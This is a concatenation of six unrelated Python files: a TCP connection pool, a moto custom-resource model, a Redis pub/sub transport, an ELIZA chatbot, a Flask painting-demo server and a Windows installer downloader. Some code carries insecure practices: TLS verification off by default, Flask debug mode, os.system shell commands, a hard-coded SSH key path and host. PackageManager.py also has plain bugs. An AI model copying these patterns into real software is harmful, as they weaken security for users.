test_main()
|
connection.py | import errno
import os
import random
import socket
import ssl
import sys
from itertools import chain
from queue import Empty, Full, LifoQueue
from basepy.exceptions import ConnectionError
import threading
import time
def threading_spawn(func, *args, **kwargs):
t = threading.Thread(target=func, args=args, kwargs=kwargs)
t.daemon = True
t.start()
return t
def threading_wait():
while 1:
try:
time.sleep(3)
except (KeyboardInterrupt, SystemExit):
sys.exit()
spawn_func = threading_spawn
sleep_func = time.sleep
lock_class = threading.Lock
wait_func = threading_wait
class Connection(object):
"""Manages TCP communication to and from a server"""
description_format = "Connection<host:%(host)s,port:%(port)s,id:%(id)s>"
def __init__(self, host, port,
socket_connect_timeout=None,
socket_timeout=None, **kwargs):
self.pid = os.getpid()
self.host = host
self.port = int(port)
self.socket_timeout = socket_timeout
self.socket_connect_timeout = socket_connect_timeout or socket_timeout
self._sock = None
self._description_args = {
'host': self.host,
'port': self.port,
'id': id(self)
}
self._connect_callbacks = []
self.buffer = b""
self.ssl_conn = False
if 'ssl_keyfile' in kwargs or 'ssl_certfile' in kwargs:
self.ssl_conn = True
self.keyfile = kwargs['ssl_keyfile']
self.certfile = kwargs['ssl_certfile']
ssl_cert_reqs = kwargs.get('ssl_cert_reqs') or ssl.CERT_NONE
ssl_ca_certs = kwargs.get('ssl_ca_certs')
if isinstance(ssl_cert_reqs, str):
cert_reqs = {
'none': ssl.CERT_NONE,
'optional': ssl.CERT_OPTIONAL,
'required': ssl.CERT_REQUIRED
}
if ssl_cert_reqs not in cert_reqs:
raise Exception("Invalid SSL "
"Certificate Requirements "
"Flag: %s" % ssl_cert_reqs)
ssl_cert_reqs = cert_reqs[ssl_cert_reqs]
self.cert_reqs = ssl_cert_reqs
self.ca_certs = ssl_ca_certs
def __repr__(self):
return self.description_format % self._description_args
def __del__(self):
try:
self.disconnect()
except Exception:
pass
def register_connect_callback(self, callback):
self._connect_callbacks.append(callback)
def clear_connect_callbacks(self):
self._connect_callbacks = []
def connect(self):
"""Connects to the server if not already connected"""
if self._sock:
return
try:
sock = self._connect()
except socket.error:
e = sys.exc_info()[1]
raise ConnectionError(self._error_message(e))
self._sock = sock
try:
self.on_connect()
except Exception:
# clean up after any error in on_connect
self.disconnect()
raise
# run any user callbacks. right now the only internal callback
# is for pubsub channel/pattern resubscription
for callback in self._connect_callbacks:
callback(self)
def _connect(self):
"""Create a TCP socket connection"""
# we want to mimic what socket.create_connection does to support
# ipv4/ipv6, but we want to set options prior to calling
# socket.connect()
resources = socket.getaddrinfo(self.host, self.port,
socket.AF_INET, socket.SOCK_STREAM)
if len(resources) == 0:
raise Exception("getaddrinfo returns an empty list")
index = random.randint(1, len(resources))
start = index % len(resources)
for i in range(len(resources)):
family, socktype, proto, canonname, socket_address \
= resources[(start+i) % len(resources)]
sock = None
try:
sock = socket.socket(family, socktype, proto)
# TCP_NODELAY
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
# set the socket_connect_timeout before we connect
sock.settimeout(self.socket_connect_timeout)
# connect
sock.connect(socket_address)
# set the socket_timeout now that we're connected
sock.settimeout(self.socket_timeout)
if self.ssl_conn:
sock = ssl.wrap_socket(sock,
cert_reqs=self.cert_reqs,
keyfile=self.keyfile,
certfile=self.certfile,
ca_certs=self.ca_certs)
return sock
except socket.error:
if sock is not None:
sock.close()
if i == len(resources)-1:
raise
raise socket.error("socket.getaddrinfo returned an empty list")
def _error_message(self, exception):
# args for socket.error can either be (errno, "message")
# or just "message"
if len(exception.args) == 1:
return "Error connecting to %s:%s. %s." % \
(self.host, self.port, exception.args[0])
else:
return "Error %s connecting to %s:%s. %s." % \
(exception.args[0], self.host, self.port, exception.args[1])
def on_connect(self):
pass
def disconnect(self):
"""Disconnects from the server"""
if self._sock is None:
return
try:
self._sock.shutdown(socket.SHUT_RDWR)
self._sock.close()
except socket.error:
pass
self._sock = None
self.on_disconnect()
def on_disconnect(self):
pass
def connection(self):
if not self._sock:
self.connect()
return self._sock
def _read(self, n=None):
sock = self.connection()
return sock.recv(n)
def read(self, byte_length):
while len(self.buffer) < byte_length:
try:
data = self._read(1024)
except socket.error as ex:
if ex.args[0] == errno.EINTR:
continue
raise ex
if not data:
break
self.buffer += data
result = self.buffer[:byte_length]
self.buffer = self.buffer[byte_length:]
return result
def write(self, string):
bstring = b""
if isinstance(string, str):
bstring = bytes(string, encoding="utf8")
elif isinstance(string, bytes):
bstring = string
sock = self.connection()
try:
return sock.sendall(bstring)
except Exception:
self.disconnect()
raise
class ConnectionPool(object):
def __init__(self,
connection_class=Connection,
max_connections=None, **kwargs):
self.connection_class = connection_class
self.max_connections = max_connections or 2 ** 31
self.connection_kwargs = kwargs
self.pid = None
self._created_connections = None
self._available_connections = None
self._in_use_connections = None
self._check_lock = None
self.reset()
def __repr__(self):
return "%s<%s>" % (
type(self).__name__,
self.connection_class.description_format
% self.connection_kwargs,
)
def reset(self):
self.pid = os.getpid()
self._created_connections = 0
self._available_connections = []
self._in_use_connections = set()
self._check_lock = lock_class()
def _checkpid(self):
if self.pid != os.getpid():
with self._check_lock:
if self.pid == os.getpid():
# another thread already did the work while we waited
# on the lock.
return
self.disconnect()
self.reset()
def get_connection(self):
"""Get a connection from the pool"""
self._checkpid()
try:
connection = self._available_connections.pop()
except IndexError:
connection = self.make_connection()
self._in_use_connections.add(connection)
return connection
def make_connection(self):
"""Create a new connection"""
if self._created_connections >= self.max_connections:
raise ConnectionError("Too many connections")
self._created_connections += 1
return self.connection_class(**self.connection_kwargs)
def release(self, connection):
"""Releases the connection back to the pool"""
self._checkpid()
if connection.pid != self.pid:
return
self._in_use_connections.remove(connection)
self._available_connections.append(connection)
def disconnect(self):
"""Disconnects all connections in the pool"""
all_conns = chain(self._available_connections,
self._in_use_connections)
for connection in all_conns:
connection.disconnect()
class BlockingConnectionPool(ConnectionPool):
"""
Thread-safe blocking connection pool.
It performs the same function as the default
``:py:class: ~basepy.network.connection.ConnectionPool``
implementation, in that, it maintains a pool of reusable
connections (safely across threads if required).
The difference is that, in the event that a client tries to get a
connection from the pool when all of connections are in use, rather than
raising a ``:py:class: ~basepy.exceptions.ConnectionError``
(as the default ``:py:class: ~basepy.network.connection.ConnectionPool``
implementation does), it makes the client wait ("blocks") for a
specified number of seconds until a connection becomes available.
Use ``max_connections`` to increase / decrease the pool size::
>>> pool = BlockingConnectionPool(max_connections=10)
Use ``timeout`` to tell it either how many seconds to wait for a connection
to become available, or to block forever:
# Block forever.
>>> pool = BlockingConnectionPool(timeout=None)
# Raise a ``ConnectionError`` after five seconds if a connection is
# not available.
>>> pool = BlockingConnectionPool(timeout=5)
"""
def __init__(self, max_connections=100, timeout=6,
connection_class=Connection, queue_class=LifoQueue,
**connection_kwargs):
self.queue_class = queue_class
self.timeout = timeout
self.pool = None
self._connections = None
super(BlockingConnectionPool, self).__init__(
connection_class=connection_class,
max_connections=max_connections,
**connection_kwargs)
def reset(self):
self.pid = os.getpid()
self._check_lock = lock_class()
# Create and fill up a thread safe queue with ``None`` values.
self.pool = self.queue_class(self.max_connections)
while True:
try:
self.pool.put_nowait(None)
except Full:
break
# Keep a list of actual connection instances so that we can
# disconnect them later.
self._connections = []
def make_connection(self):
"""Make a fresh connection."""
connection = self.connection_class(**self.connection_kwargs)
self._connections.append(connection)
return connection
def get_connection(self):
"""
Get a connection, blocking for ``self.timeout`` until a connection
is available from the pool.
If the connection returned is ``None`` then creates a new connection.
Because we use a last-in first-out queue, the existing connections
(having been returned to the pool after the initial ``None`` values
were added) will be returned before ``None`` values. This means we only
create new connections when we need to, i.e.: the actual number of
connections will only increase in response to demand.
"""
# Make sure we haven't changed process.
self._checkpid()
# Try and get a connection from the pool. If one isn't available within
# self.timeout then raise a ``ConnectionError``.
try:
connection = self.pool.get(block=True, timeout=self.timeout)
except Empty:
raise ConnectionError("No connection available.")
# If the ``connection`` is actually ``None`` then that's a cue to make
# a new connection to add to the pool.
if connection is None:
connection = self.make_connection()
return connection
def release(self, connection):
"""Releases the connection back to the pool."""
# Make sure we haven't changed process.
self._checkpid()
if connection.pid != self.pid:
return
# Put the connection back into the pool.
try:
self.pool.put_nowait(connection)
except Full:
# perhaps the pool has been reset() after a fork? regardless,
# we don't want this connection
pass
def disconnect(self):
"""Disconnects all connections in the pool."""
for connection in self._connections:
connection.disconnect()
|
custom_model.py | import json
import threading
from moto import settings
from moto.core.models import CloudFormationModel
from moto.awslambda import lambda_backends
from uuid import uuid4
class CustomModel(CloudFormationModel):
def __init__(self, region_name, request_id, logical_id, resource_name):
self.region_name = region_name
self.request_id = request_id
self.logical_id = logical_id
self.resource_name = resource_name
self.data = dict()
self._finished = False
def set_data(self, data):
self.data = data
self._finished = True
def is_created(self):
return self._finished
@property
def physical_resource_id(self):
return self.resource_name
@staticmethod
def cloudformation_type():
return "?"
@classmethod
def create_from_cloudformation_json(
cls, resource_name, cloudformation_json, region_name, **kwargs
):
logical_id = kwargs["LogicalId"]
stack_id = kwargs["StackId"]
resource_type = kwargs["ResourceType"]
properties = cloudformation_json["Properties"]
service_token = properties["ServiceToken"]
backend = lambda_backends[region_name]
fn = backend.get_function(service_token)
request_id = str(uuid4())
custom_resource = CustomModel(
region_name, request_id, logical_id, resource_name
)
from moto.cloudformation import cloudformation_backends
stack = cloudformation_backends[region_name].get_stack(stack_id)
stack.add_custom_resource(custom_resource)
event = {
"RequestType": "Create",
"ServiceToken": service_token,
# A request will be send to this URL to indicate success/failure
# This request will be coming from inside a Docker container
# Note that, in order to reach the Moto host, the Moto-server should be listening on 0.0.0.0
#
# Alternative: Maybe we should let the user pass in a container-name where Moto is running?
# Similar to how we know for sure that the container in our CI is called 'motoserver'
"ResponseURL": f"{settings.moto_server_host()}/cloudformation_{region_name}/cfnresponse?stack={stack_id}",
"StackId": stack_id,
"RequestId": request_id,
"LogicalResourceId": logical_id,
"ResourceType": resource_type,
"ResourceProperties": properties,
}
invoke_thread = threading.Thread(
target=fn.invoke, args=(json.dumps(event), {}, {})
)
invoke_thread.start()
return custom_resource
@classmethod
def has_cfn_attr(cls, attribute):
# We don't know which attributes are supported for third-party resources
return True
def get_cfn_attribute(self, attribute_name):
if attribute_name in self.data:
return self.data[attribute_name]
return None
|
pubsub_redis.py | #
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
"""
In order to run this pubsub transport, you need to have the python
'redis-py' module installed. AND you need to be running a Redis server.
"""
import threading
import time
import redis
from g2base import Callback
from g2base.remoteObjects import ro_packer
class BufferedRedis(redis.Redis):
"""
Wrapper for Redis pub-sub that uses a pipeline internally
for buffering message publishing. A thread is run that
periodically flushes the buffer pipeline.
"""
def __init__(self, *args, **kwargs):
super(BufferedRedis, self).__init__(*args, **kwargs)
self.flush_interval = 0.001
self.flush_size = 1000
self.buffer = self.pipeline()
self.lock = threading.Lock()
t = threading.Thread(target=self.flusher, args=[])
t.start()
def flush(self):
"""
Manually flushes the buffer pipeline.
"""
with self.lock:
self.buffer.execute()
def flusher(self):
"""
Thread that periodically flushes the buffer pipeline.
"""
while True:
time.sleep(self.flush_interval)
with self.lock:
self.buffer.execute()
def publish(self, *args, **kwargs):
"""
Overrides publish to use the buffer pipeline, flushing
it when the defined buffer size is reached.
"""
with self.lock:
self.buffer.publish(*args, **kwargs)
if len(self.buffer.command_stack) >= self.flush_size:
self.buffer.execute()
class PubSub(Callback.Callbacks):
def __init__(self, host='localhost', port=6379, db=1,
logger=None):
Callback.Callbacks.__init__(self)
self.host = host
self.port = port
self.db = db
self.logger = logger
self.redis = None
self.pubsub = None
self.timeout = 0.2
self.reconnect()
def reconnect(self):
self.redis = redis.StrictRedis(host=self.host, port=self.port,
db=self.db)
## self.redis = BufferedRedis(host=self.host, port=self.port,
## db=self.db)
self.pubsub = self.redis.pubsub()
self.pubsub.subscribe('admin')
def publish(self, channel, envelope, pack_info):
packet = ro_packer.pack(envelope, pack_info)
self.redis.publish(channel, packet)
def flush(self):
if hasattr(self.redis, 'flush'):
# only our BufferedRedis has flush
self.redis.flush()
def subscribe(self, channel):
if not self.has_callback(channel):
self.enable_callback(channel)
self.pubsub.subscribe(channel)
def unsubscribe(self, channel):
self.pubsub.unsubscribe(channel)
def start(self, ev_quit=None):
if ev_quit is None:
ev_quit = threading.Event()
self.ev_quit = ev_quit
t = threading.Thread(target=self.subscribe_loop,
args=[ev_quit])
t.start()
def stop(self):
self.ev_quit.set()
def listen(self):
pkt = self.pubsub.get_message(timeout=self.timeout)
if pkt is None:
# timeout
return
# this is Redis API--packet will have type, channel and
# data fields.
if pkt['type'] != "message":
return
channel = pkt['channel']
channel = channel.decode('utf-8')
try:
packet = pkt['data']
envelope = ro_packer.unpack(packet)
except Exception as e:
if self.logger is not None:
self.logger.error("Error unpacking payload: %s" % (str(e)))
raise
# need traceback
# this will catch its own exceptions so that we don't
# kill the subscribe loop
self.make_callback(channel, channel, envelope)
def subscribe_loop(self, ev_quit):
self.ev_quit = ev_quit
while not ev_quit.is_set():
self.listen()
# END
|
eliza.py | import logging
import random
import re
from collections import namedtuple
from EmotionDynamics import EmotionalAgent
import threading
# Fix Python2/Python3 incompatibility
try: input = raw_input
except NameError: pass
log = logging.getLogger(__name__)
class Key:
def __init__(self, word, weight, decomps):
self.word = word
self.weight = weight
self.decomps = decomps
class Decomp:
def __init__(self, parts, save, reasmbs):
self.parts = parts
self.save = save
self.reasmbs = reasmbs
self.next_reasmb_index = 0
class Eliza:
def __init__(self):
self.initials = []
self.finals = []
self.quits = []
self.pres = {}
self.posts = {}
self.synons = {}
self.keys = {}
self.memory = []
#Instance of EmotionalAgent
self.wasabi = EmotionalAgent()
def load(self, path):
key = None
decomp = None
with open(path) as file:
for line in file:
if not line.strip():
continue
tag, content = [part.strip() for part in line.split(':')]
if tag == 'initial':
self.initials.append(content)
elif tag == 'final':
self.finals.append(content)
elif tag == 'quit':
self.quits.append(content)
elif tag == 'pre':
parts = content.split('%%')
self.pres[parts[0]] = parts[1:]
elif tag == 'post':
parts = content.split('%%')
self.posts[parts[0]] = parts[1:]
elif tag == 'synon':
parts = content.split('%%')
self.synons[parts[0]] = parts
elif tag == 'key':
parts = content.split(' ')
word = parts[0]
weight = int(parts[1]) if len(parts) > 1 else 1
key = Key(word, weight, [])
self.keys[word] = key
elif tag == 'decomp':
parts = content.split(' ')
save = False
if parts[0] == '$':
save = True
parts = parts[1:]
decomp = Decomp(parts, save, [])
key.decomps.append(decomp)
elif tag == 'reasmb':
parts = content.split(' ')
decomp.reasmbs.append(parts)
def _match_decomp_r(self, parts, words, results):
if not parts and not words:
return True
if not parts or (not words and parts != ['*']):
return False
if parts[0] == '*':
for index in range(len(words), -1, -1):
results.append(words[:index])
if self._match_decomp_r(parts[1:], words[index:], results):
return True
results.pop()
return False
elif parts[0].startswith('@'):
root = parts[0][1:]
if not root in self.synons:
raise ValueError("Unknown synonym root {}".format(root))
if not words[0].lower() in self.synons[root]:
return False
results.append([words[0]])
return self._match_decomp_r(parts[1:], words[1:], results)
elif parts[0].lower() != words[0].lower():
return False
else:
return self._match_decomp_r(parts[1:], words[1:], results)
def _match_decomp(self, parts, words):
results = []
if self._match_decomp_r(parts, words, results):
return results
return None
def _next_reasmb(self, decomp):
index = decomp.next_reasmb_index
result = decomp.reasmbs[index % len(decomp.reasmbs)]
decomp.next_reasmb_index = index + 1
return result
def _reassemble(self, reasmb, results):
output = []
for reword in reasmb:
if not reword:
continue
if reword[0] == '(' and reword[-1] == ')':
index = int(reword[1:-1])
if index < 1 or index > len(results):
raise ValueError("Invalid result index {}".format(index))
insert = results[index - 1]
for punct in [',', '.', ';']:
if punct in insert:
insert = insert[:insert.index(punct)]
output.extend(insert)
else:
output.append(reword)
return output
def _sub(self, words, sub):
output = []
for word in words:
word_lower = word.lower()
if word_lower in sub:
output.extend(sub[word_lower])
else:
output.append(word)
return output
def _match_key(self, words, key):
for decomp in key.decomps:
results = self._match_decomp(decomp.parts, words)
if results is None:
log.debug('Decomp did not match: %s', decomp.parts)
continue
log.debug('Decomp matched: %s', decomp.parts)
log.debug('Decomp results: %s', results)
results = [self._sub(words, self.posts) for words in results]
log.debug('Decomp results after posts: %s', results)
reasmb = self._next_reasmb(decomp)
log.debug('Using reassembly: %s', reasmb)
if reasmb[0] == 'goto':
goto_key = reasmb[1]
if not goto_key in self.keys:
raise ValueError("Invalid goto key {}".format(goto_key))
log.debug('Goto key: %s', goto_key)
return self._match_key(words, self.keys[goto_key])
output = self._reassemble(reasmb, results)
if decomp.save:
self.memory.append(output)
log.debug('Saved to memory: %s', output)
continue
return output
return None
def respond(self, text):
if text.lower() in self.quits:
return None
text = re.sub(r'\s*\.+\s*', ' . ', text)
text = re.sub(r'\s*,+\s*', ' , ', text)
text = re.sub(r'\s*;+\s*', ' ; ', text)
log.debug('After punctuation cleanup: %s', text)
words = [w for w in text.split(' ') if w]
log.debug('Input: %s', words)
words = self._sub(words, self.pres)
log.debug('After pre-substitution: %s', words)
keys = [self.keys[w.lower()] for w in words if w.lower() in self.keys]
keys = sorted(keys, key=lambda k: -k.weight)
log.debug('Sorted keys: %s', [(k.word, k.weight) for k in keys])
output = None
for key in keys:
output = self._match_key(words, key)
if output:
log.debug('Output from key: %s', output)
break
if not output:
if self.memory:
index = random.randrange(len(self.memory))
output = self.memory.pop(index)
log.debug('Output from memory: %s', output)
else:
output = self._next_reasmb(self.keys['xnone'].decomps[0])
log.debug('Output from xnone: %s', output)
#random emotion selection for task 2
#emotionList = ["gluecklich", "traurig", "wuetend", "ausgeglichen"]
output = " ".join(output)
#emotion gets an impulse
if "emoimpulsePlaceholder" in output:
self.wasabi.emoimpulse(float(output[output.find("emoimpulsePlaceholder")+22:]))
self.wasabi.calculate_emotions()
output = output[:output.find("emoimpulsePlaceholder")]
#user asks for emotion
output = output.replace("emotionDynamicsPlaceholder", self.wasabi.get_emotion())
return output
def initial(self):
return random.choice(self.initials)
def final(self):
return random.choice(self.finals)
def run(self):
print(self.initial())
while True:
sent = input('> ')
output = self.respond(sent)
if output is None:
break
print(output)
print(self.final())
def main():
eliza = Eliza()
#new Thread for emotion changes over time e.g. getting bored
t = threading.Thread(target=eliza.wasabi.calculate_emotions_continuously)
t.daemon = True
t.start()
eliza.load('doctor_de.txt')
eliza.run()
if __name__ == '__main__':
logging.basicConfig()
main()
|
server.py | from flask import Flask
from flask import request, Response, render_template, json, url_for
from flask_restful import reqparse, abort, Api, Resource
import os
import base64
from io import BytesIO
import qrcode
import time
import threading
# Create an instance of Flask API
app = Flask(__name__, template_folder="templates")
api = Api(app)
# Create a URL route in our application for "/"
@app.route('/')
def home():
"""
This function just responds to the browser ULR
localhost:5000/
:return: the rendered template 'index.html'
"""
return render_template('index.html')
# For developing purpose - test camera toggle
@app.route('/test_tab')
def test_tab():
return render_template('test_tab.html')
# class ImageHandler(Resource):
# def post(self):
# # image_data = request.form.get('upimage')
# image_data = request.files.get('upimage')
# print(image_data)
# if image_data is not None:
# image_data.save('image.jpg')
# else:
# print('Warning: Empty picture! Make sure that the browser has the permission to use the camera.')
# # with open('image.png', 'wb') as fout:
# # fout.write(image_data)
"""
Contains a POST funnction.
- Post the uploaded movie URL to /qr endpoint, return generated QR image in binary data as the body of POST response.
"""
class QRGenerator(Resource):
def post(self):
print('The param is', request.form.get('text_data'))
print(app.instance_path)
img_qr = qrcode.make(request.form.get('text_data'))
# return json.dumps({'src': os.path.join(app.root_path, 'qr.png')})
# return json.dumps({'src': '../qr.png'})
# print(img_qr)
# buffered = BytesIO()
img_qr.save('qr.png')
# return json.dumps({'src': base64.b64encode(buffered.getvalue)})
return json.dumps({'src': url_for('static', filename='qr.png')})
"""
Contains a GET function.
- Get the URL of the uploaded movie URL via specified `movie_id`.
Contains a POST function.
- Post the taken image to server, the server will use pretrained model to generate strokes and movie on local.
The movie is uploaded to a remote server and a mapped QR code is generated.
"""
class RelayServer(Resource):
def __init__(self):
super(RelayServer, self).__init__()
# Directory for rendered images
self.output_dir = 'app/output'
# For support multiple users
self.user_id = 0
self.active_users = []
# TODO: what does movie_link_dict mean?
self.movie_link_dict = dict()
self.last_sharable_movie_link = None
# def movie_upload_daemon(self):
# """
# For QR code, to check if movies are uploaded to expected URL every 5 seconds.
# """
# # TODO: login to SURFdrive, upload movie, get sharable link
# # def upload_movie_to_drive(active_user, output_dir):
# # movie_path = os.path.join(output_dir, str(active_user), 'video.mp4')
# # new_video_fn = 'video_%s.mp4' % output_dir
# # shared_link = None
# # return shared_link
# def check_upload(active_users_list, output_dir, movie_link_dict):
# while True:
# print('Checking %d active users' % len(active_users_list))
# for active_user in active_users_list:
# # check if movie exists
# movie_path = os.path.join(output_dir, str(active_user), 'video.mp4')
# if os.path.isfile(movie_path):
# # movie exists. Check whether it is uploaded to the server.
# if movie_path in movie_link_dict.values():
# # movie has been shared. Remove from monitoring
# active_users_list.remove(active_user)
# else:
# # check whether movie is fully sync'ed by determining whether an empty file `DONE` is present
# if os.path.isfile(os.path.join(output_dir, str(active_user), 'DONE')):
# # movie is fully downloaded, upload the movie now
# # shared_link = upload_movie_to_drive(active_user, output_dir)
# # link_dict[movie_path] = shared_link
# print('movie_path', movie_path, url_for('static', filename=movie_path))
# movie_link_dict[active_user] = movie_path
# else:
# # movie is still downloading. Just wait
# pass
# time.sleep(5)
# try:
# th = threading.Thread(target=check_upload, args=(self.active_users, self.output_dir, self.movie_link_dict))
# th.start()
# return th
# except:
# print('Error: unable to start the daemon to upload the movie!')
# return None
def get(self):
"""
Using HTTP GET to submit an ID (which is the timestamp) of the rendered movie.
Return: The URL of the movie if it is ready. Otherwise return an empty URL.
"""
ts = request.args.get('movie_id')
print('Get a request')
movie_path = os.path.join(self.output_dir, str(ts), 'video.mp4')
print("movie path is", movie_path)
if os.path.isfile(movie_path):
movie_shared_url = 'https://home.maxwellcai.com/learning_to_paint_videos/video_output/%s.mp4' % str(ts)
print('Sharable movie link', movie_shared_url)
return json.dumps({'src': url_for('static', filename=os.path.join('output', str(ts), 'video.mp4')), 'sharable': movie_shared_url})
else:
return json.dumps({'src': ""}) # return empty URL if movie is not yet ready
def post(self):
# Extract taken picture data.
image_data = request.files.get('upimage')
if image_data is not None:
timestamp = time.time()
self.active_users.append(timestamp)
user_output_dir = os.path.join(self.output_dir, str(timestamp))
print("user_output_dir", user_output_dir)
if not os.path.isdir(user_output_dir):
os.makedirs(user_output_dir)
# save camera image.
print("Save camera images...")
image_data.save(os.path.join(user_output_dir, 'image.jpg'))
# generate the movie frame
orig_dir = os.getcwd()
print("original dir is", orig_dir)
os.chdir(user_output_dir)
print('Generating frames...')
os.system('python /Users/pennyqxr/Code/LearningToPaintDemo/baseline/test.py --img image.jpg --actor /Users/pennyqxr/Code/LearningToPaintDemo/baseline/model/actor.pkl --renderer /Users/pennyqxr/Code/LearningToPaintDemo/baseline/model/renderer.pkl')
# generate the movie
print('Generate movie...')
os.system('ffmpeg -r 30 -f image2 -i output/generated_%05d.jpg -s 512x512 -c:v libx264 -pix_fmt yuv420p video.mp4 -q:v 0 -q:a 0')
os.system('touch DONE')
# upload the movie to a HTTPS server
os.system('scp -i /Users/pennyqxr/.ssh/id_rsa_pi -P 13893 video.mp4 pi@home.maxwellcai.com:/var/www/html/learning_to_paint_videos/video_output/%s.mp4' % str(timestamp))
# get back to the original dir
os.chdir(orig_dir)
# generate QR code of the movie
movie_shared_url = 'https://home.maxwellcai.com/learning_to_paint_videos/video_output/%s.mp4' % str(timestamp)
self.last_sharable_movie_link = movie_shared_url
qr_link = self.generate_qr_code(movie_shared_url, timestamp)
self.user_id += 1
return json.dumps({'src': qr_link, 'ts': timestamp, 'sharable': movie_shared_url})
else:
print('Warning: Empty picture! Make sure that the browser has the permission to use the camera.')
def generate_qr_code(self, shared_link, timestamp):
"""
Generate a QR code so that the user can download the rendered movie.
Return: a JSON string with the URL of the QR code (to be displayed in the web interface).
"""
img_qr = qrcode.make(shared_link)
try:
if not os.path.isdir('app/static/qr'):
os.makedirs('app/static/qr')
img_qr.save(os.path.join('app/static/qr', 'qr_%s.png' % str(timestamp)))
except OSError as error:
print("Error when generate QR code", error)
return None
# create a URL for generated QR code
return url_for('static', filename='qr/qr_%s.png' % str(timestamp))
# Setup the Api resource routing here
api.add_resource(QRGenerator, '/qr')
api.add_resource(RelayServer, '/server')
# Start the application by running as the main program itself
if __name__ == '__main__':
app.run(debug=True)
|
PackageManager.py | ######################################################################
# PACKAGE MANAGER #
######################################################################
from logger import log_info, closeLog
from Classes.Download import Download
from Classes.Install import Install
from multiprocessing import Process
from subprocess import PIPE
from threading import Thread
from colorama import Back
from extension import *
from utils import *
from time import *
import subprocess
import tempfile
import requests
import zipfile
import cursor
import click
import sys
import os
paths = {}
class PackageManager:
def __init__(self, packets, metadata):
self.packets = packets
self.metadata = metadata
def download(self, download: Download):
cursor.hide()
if not os.path.isdir(Rf'{tempfile.gettempdir()}\electric'):
os.mkdir(Rf'{tempfile.gettempdir()}\electric')
path = Rf'{tempfile.gettempdir()}\electric\{download.name}{download.extension}'
with open(path, 'wb') as f:
response = requests.get(download.url, stream=True)
total_length = response.headers.get('content-length')
if total_length is None:
f.write(response.content)
else:
dl = 0
full_length = int(total_length)
for data in response.iter_content(chunk_size=4096):
dl += len(data)
f.write(data)
complete = int(20 * dl / full_length)
fill_c, unfill_c = '█' * complete, ' ' * (20 - complete)
try:
sys.stdout.write(
f"\r[{fill_c}{unfill_c}] ⚡ {round(dl / full_length * 100, 1)} % ⚡ {round(dl / 1000000, 1)} / {round(full_length / 1000000, 1)} MB")
except UnicodeEncodeError:
pass
sys.stdout.flush()
paths.update({download.display_name: {'path': path,
'display_name': download.display_name}})
cursor.show()
def install_package(self, install: Install) -> str:
path = install.path
switches = install.install_switches
download_type = install.download_type
custom_install_switch = install.custom_install_switch
directory = install.directory
if download_type == '.exe':
if '.exe' not in path:
if not os.path.isfile(path + '.exe'):
os.rename(path, f'{path}.exe')
path = path + '.exe'
command = path + ' '
for switch in switches:
command = command + ' ' + switch
if custom_install_switch and directory:
if '/D=' in custom_install_switch:
command += ' ' + custom_install_switch + f'{directory}'
else:
command += ' ' + custom_install_switch + f'"{directory}"'
# if custom_install_switch == '':
# click.echo(click.style(
# f'Installing {install.display_name} To Default Location, Custom Installation Directory Not Supported By This Installer!', fg='yellow'))
if custom_install_switch == 'None':
click.echo(click.style(
f'Installing {install.display_name} To Default Location, Custom Installation Directory Not Supported By This Installer!', fg='yellow'))
run_cmd(command, self.metadata, 'installation', install.display_name)
elif download_type == '.msi':
command = 'msiexec.exe /i' + path + ' '
for switch in switches:
command = command + ' ' + switch
run_cmd(command, self.metadata, 'installation', install.display_name)
elif download_type == '.zip':
if not self.metadata.no_color:
click.echo(click.style(
f'Unzipping File At {path}', fg='green'))
if self.metadata.no_color:
click.echo(click.style(
f'Unzipping File At {path}'))
zip_directory = fR'{tempfile.gettempdir()}\\{self.metadata.display_name}'
with zipfile.ZipFile(path, 'r') as zip_ref:
zip_ref.extractall(zip_directory)
executable_list = []
for name in os.listdir(zip_directory):
if name.endswith('.exe'):
executable_list.append(name)
executable_list.append('Exit')
file_path = fR'{tempfile.gettempdir()}\\{self.metadata.display_name}'
def trigger():
click.clear()
for executable in executable_list:
if executable == executable_list[index]:
print(Back.CYAN + executable + Back.RESET)
else:
print(executable)
trigger()
def up():
global index
if len(executable_list) != 1:
index -= 1
if index >= len(executable_list):
index = 0
trigger()
return
trigger()
def down():
global index
if len(executable_list) != 1:
index += 1
if index >= len(executable_list):
index = 0
trigger()
return
trigger()
def enter():
if executable_list[index] == 'Exit':
os._exit(0)
else:
path = file_path + "\\" + executable_list[index]
click.echo(click.style(
f'Running {executable_list[index]}. Hit Control + C to Quit', fg='magenta'))
subprocess.call(path, stdout=PIPE,
stdin=PIPE, stderr=PIPE)
quit()
keyboard.add_hotkey('up', up)
keyboard.add_hotkey('down', down)
keyboard.add_hotkey('enter', enter)
keyboard.wait()
def calculate_spwn(self, number: int) -> str:
if number <= 3:
return 'threading'
return 'processing'
def handle_dependencies(self):
for packet in self.packets:
if packet.dependencies:
install_dependent_packages(packet, self.metadata.rate_limit, packet.directory, self.metadata)
def handle_multi_download(self) -> list:
self.handle_dependencies()
metadata = self.metadata
write(
f'Successfully Transferred Electrons', 'cyan', metadata)
log_info(f'Electrons Successfully Transferred', metadata.logfile)
write('Initializing Rapid Download...', 'green', metadata)
log_info('Initializing Rapid Download...', metadata.logfile)
packets = self.packets
download_items = []
if len(packets) > 1:
idx = 0
for packet in packets:
download_items.append(Download(packet.win64, packet.win64_type,
f'Setup{idx}', packet.display_name, f"{tempfile.gettempdir()}\\Setup{idx}{packet.win64_type}"))
idx += 1
elif len(packets) == 1:
download_items.append(Download(packets[0].win64, packets[0].win64_type, 'Setup0',
packets[0].display_name, f"{tempfile.gettempdir()}\\Setup0{packets[0].win64_type}"))
for item in download_items:
write_verbose(f'Sending request to {item.url} for downloading {item.display_name}', self.metadata)
write_debug(f'Downloading {item.display_name} from {item.url} into {item.name}{item.extension}', self.metadata)
method = self.calculate_spwn(len(packets))
if method == 'threading':
threads = []
for item in download_items:
threads.append(Thread(target=self.download, args=(item,)))
for thread in threads:
thread.start()
for x in threads:
x.join()
if method == 'processing':
processes = []
for item in download_items:
processes.append(Process(target=self.download, args=(item,)))
for process in processes:
process.start()
for x in processes:
x.join()
for item in download_items:
if self.metadata.virus_check:
write(
f'\nScanning {item.display_name} For Viruses...', 'blue', metadata)
check_virus(item.path, metadata)
write_debug(f'Rapid Download Successfully Downloaded {len(download_items)} Packages Using RapidThreading', metadata)
write_debug('Rapid Download Exiting With Code 0', metadata)
if not self.metadata.debug:
write('\nFinished Rapid Download...', 'green', metadata)
else:
write('Finished Rapid Download...', 'green', metadata)
